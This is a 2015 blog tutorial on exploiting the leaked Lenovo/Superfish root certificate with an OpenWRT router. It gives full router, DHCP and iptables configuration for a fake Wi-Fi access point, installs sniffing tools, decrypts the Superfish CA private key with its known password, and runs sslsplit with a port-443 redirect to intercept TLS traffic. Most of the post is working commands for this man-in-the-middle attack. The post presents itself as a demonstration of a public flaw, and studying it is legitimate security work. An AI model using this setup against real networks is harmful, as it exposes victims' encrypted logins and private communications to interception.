Friday, March 13, 2015

Exploiting superfish the OpenWRT way

Exploiting the Superfish certificate, the OpenWRT way

As you could read in the Robert Graham post Exploiting the Superfish certificate , you can use a raspberry Pi to exploit the Lenovo/Superfish certificate.

If you don't have a Raspberry at home you don't need to buy one, I'm sure you have at your home a small router where you can install OpenWRT and a USB flash memory. Routers have the advantage that they are built to act as APs.

OpenWRT compatible router

You can find the list of compatible routers here http://wiki.openwrt.org/toh/start .

I bought a pair of TP-Link TL-WR703N 2 years ago because they are cheap, small, 1 USB port, 1 Wifi interface and 1 Ethernet interface. The problem is that it has only 4 MB of flash memory, but we can use a USB Flash to extend the filesystem.

USB Storage

To extend the filesystem we need to install some modules, you need to follow the instrucions from the OpenWrt Wiki .

If you haven't enough space to install these modules you'll need to build your custom OpenWRT image .
Don't worry, there is an image generator and you don't have to deal with difficult compilation processes.
You only have to:

  • Download the image generator for your router architecture
  • Uncompress it
  • cd into the directory and,
  • make image PROFILE='profile of your router' PACKAGES='kmod-usb-storage block-mount kmod-fs-ext4'
  • flash the router with the image in the ./bin/ architecture / directory.

Once we have the router flashed we need to mount the USB flash, remember that you need to format the USB with an ext4 filesystem.

When you plug the usb you need to find the partition and mount it:

root@OpenWRT:~$ cat /proc/partitions
major minor  blocks  name

  31        0        128 mtdblock0
  31        1       1081 mtdblock1
  31        2       2822 mtdblock2
  31        3        704 mtdblock3
  31        4         64 mtdblock4
  31        5       3904 mtdblock5
   8        0    3929088 sda
   8        1    3924472 sda1

root@OpenWRT:~$ mkdir /mnt/usb

You have to add this lines to the file fstab

#/etc/config/fstab
config mount
        option target '/mnt/usb'
        option enabled '1'
        option device '/dev/sda1'
        option fstype 'ext4'

and add this line in /etc/opkg.conf

dest usb /mnt/sda1

You can install all packages thath you want to convert the router in a hacker tool ;)

root@OpenWRT:~$ opkg update
root@OpenWRT:~$ opkg install -d usb wireless-tools tcpdump dsniff aircrack-ng ngrep autossh

Some packages need some tweaks to work in order to find some files, you can solve it with this lines in the file /etc/rc.local :

ln -s /mnt/usb/usr/sbin/iwconfig /usr/bin/iwconfig
ln -s /mnt/usb/usr/sbin/iwpriv /usr/bin/iwpriv
ln -s /mnt/usb/usr/sbin/iwlist /usr/bin/iwlist
ln -s /mnt/usb/usr/lib/dsniff.services /usr/lib/dsniff.services

Fake AP

Once we have the router flashed with the new image and the USB storage is working, we need to setup the fake routed AP.

You need to modify 3 files:

  • The network file with network settings
#/etc/config/network
config interface 'loopback'
        option ifname 'lo'
        option proto 'static'
        option ipaddr '127.0.0.1'
        option netmask '255.0.0.0'

config interface 'wan'
        option ifname 'eth0'
        option type 'bridge'
        option _orig_ifname 'eth0'
        option _orig_bridge 'true'
        option proto 'dhcp'
        option hostname 'superfishAP.local'

config 'interface' 'wifi'
        option 'proto'      'static'
        option 'ipaddr'     '192.168.2.1'
        option 'netmask'    '255.255.255.0'
  • The dhcp file to configure a dhcp server for the AP
/etc/config/dhcp
config dnsmasq
        option domainneeded '1'
        option boguspriv '1'
        option localise_queries '1'
        option rebind_protection '1'
        option rebind_localhost '1'
        option local '/lan/'
        option domain 'lan'
        option expandhosts '1'
        option readethers '1'
        option leasefile '/tmp/dhcp.leases'
        option resolvfile '/tmp/resolv.conf.auto'

config dhcp 'wifi'
        option interface 'wifi'
        option start '100'
        option limit '150'
        option leasetime '1h'

config dhcp 'wan'
        option interface 'wan'
        option ignore '1'

config odhcpd 'odhcpd'
        option maindhcp '0'
        option leasefile '/tmp/hosts/odhcpd'
        option leasetrigger '/usr/sbin/odhcpd-update'
  • The firewall file:

I disabled firewall scripts /etc/init.d/firewall disable because I prefer to use iptables rules You need to create the file /etc/iptables-rules and load it using
iptables-restore < /etc/iptables.rules

#/etc/iptables-rules
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 192.168.2.0/24 ! -d 192.168.1.0/24 -o br-wan -j MASQUERADE
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*raw
:PREROUTING ACCEPT [1050:140052]
:OUTPUT ACCEPT [512:153008]
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*mangle
:PREROUTING ACCEPT [1050:140052]
:INPUT ACCEPT [790:68328]
:FORWARD ACCEPT [245:70278]
:OUTPUT ACCEPT [512:153008]
:POSTROUTING ACCEPT [757:223286]
COMMIT
# Completed on Thu Mar  5 19:30:56 2015
# Generated by iptables-save v1.4.21 on Thu Mar  5 19:30:56 2015
*filter
:INPUT ACCEPT [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i br-wan -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i br-wan -p udp -m udp --dport 68:69 -j ACCEPT
-A INPUT -i br-wan -p icmp -j ACCEPT
-A INPUT -i wlan0 -p udp -m udp --dport 67:68 -j ACCEPT
-A INPUT -i wlan0 -p udp -m udp --dport 53 -j ACCEPT
-A FORWARD -s 192.168.2.0/24 ! -d 192.168.1.0/24 -i wlan0 -o br-wan -j ACCEPT
-A FORWARD ! -s 192.168.1.0/24 -d 192.168.2.0/24 -i br-wan -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 25 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 80 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 110 -j ACCEPT
-A OUTPUT -o br-wan -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Thu Mar  5 19:30:56 2015

These rules permits only internet access to ports 25,80,110 and 443 from WiFi clients.

To do it persistent you have to add this line to the file /etc/rc.local

/usr/sbin/iptables-restore < /etc/iptables.rules

SSL interception

Ok, we have a working AP where we can sniff al traffic except SSL.

The unique tool that worked for me was sslsplit , but there isn't an official package. You have to download the unofficial binary from this site https://github.com/ShaPOC/ProjectGhost/blob/master/software/sslsplit/bin/sslsplit , I stored it in /mnt/usb/usr/bin/ .

The next steps are:

  • Create a directory /mnt/usb/sslsplit and cd into it.
  • Create a directory /mnt/usb/sslsplit/log.
  • Download the file test.pem from https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
  • Decrypt the file using the password "komodia"
    openssl rsa -in test.pem -out ca.key
  • Copy the file test.pem to ca.cer and then remove the PRIVATE KEY section
    sed '/-----BEGIN ENCRYPTED PRIVATE KEY-----/,/-----END ENCRYPTED PRIVATE KEY----/d' test.pem > ca.cer

You can start the MiTM with:

sslsplit -D -l connections.log -S /mnt/usb/sslsplit/log -k ca.key -c ca.cer ssl 0.0.0.0 8443

but don't forget to redirect all SSL traffic:

iptables -t nat -i wlan0 -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8443

And that's it! All normal traffic goes through like a normal WiFi access point, but SSL traffic on port 443 get's MitMed with the Superfish CA!